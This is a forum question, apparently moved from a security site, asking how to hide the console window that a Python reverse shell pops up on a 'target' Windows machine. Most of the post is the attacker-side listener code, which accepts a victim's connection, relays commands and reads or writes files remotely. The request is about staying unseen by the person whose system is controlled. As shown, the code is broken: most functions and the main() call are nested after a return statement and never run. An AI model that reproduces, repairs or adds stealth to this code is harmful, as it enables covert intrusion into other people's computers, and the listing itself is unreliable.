# Hide payload window on target system. Python Reverse Shell

Tags: windows, python, reverse-shell

I'm using this simple python reverse shell.

When this runs, a command window pops up on the target Windows system. Is there a way to hide it?

```
import socket

BUFFER_SIZE = 1024
attacker_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# lets the attacker server listen on the specified port number
def attacker_server_binder(hostname, port_number):
    attacker_server.bind((hostname, port_number))
    attacker_server.listen(5)


# listening for connections
def target_client_connection_receiver():
    while True:
        # receive connection from target client
        target_client, target_client_address = attacker_server.accept()
        
        if(target_client != None):
            break
    print("Connection established to target\n $reverse_shell: ", end="")
    return target_client


    # connects to the client being targeted
    def send_data(data, target_client):
        
        target_client.send(bytes(data, 'utf-8'))
        acknowledgement =  target_client.recv(BUFFER_SIZE)
        if(acknowledgement == b'ACK'):
            # print("Data received at target end")
            receive_data(target_client)
        else:
            print("Acknowledgement receipt not received.\n$reverse_shell: ", end = "")
    
    
    def receive_data(target_client):
        response = ""
        while True:
            received_data = target_client.recv(BUFFER_SIZE)
            received_data = received_data.decode('utf-8')
            response = response + received_data
            if(len(received_data) < BUFFER_SIZE):
                break
        print(response + "\n$reverse_shell: ", end= "")
    
        
    def command_handler(target_client):
        data = str(input())
        try:
            data.index('file')
            file_handler(target_client, data)
            return
        except:
            pass
        send_data(data, target_client)
    
    
    def file_handler(target_client, command):
        target_client.send(bytes(command, 'utf-8'))
        acknowledgement = target_client.recv(BUFFER_SIZE)
        if(acknowledgement == b'ACK'):
            pass
        data_splits = command.split(' ')
        mode = data_splits[2]
        if(mode == 'r'):
            receive_data(target_client)
                
        elif(mode == 'w' or mode == 'a'):
    
            print("enter FILE_UPDATE_QUIT to end data transfer")
            while True:
                data = str(input("--> "))
                target_client.send(bytes(data, 'utf-8'))
                if(data == 'FILE_UPDATE_QUIT'):
                    break
            receive_data(target_client)
    
    def main():
        attacker_server_binder("192.168.29.15", 1234)
    
        # receive connection from target client
        target_client = target_client_connection_receiver()
    
        while True:
            command_handler(target_client)
    
    main()
```

Comment: Although this is a reverse shell, this isn't a security question. This is a pure python question.

Comment: @schroeder why did it get closed..then?

Comment: it got *moved* to here ...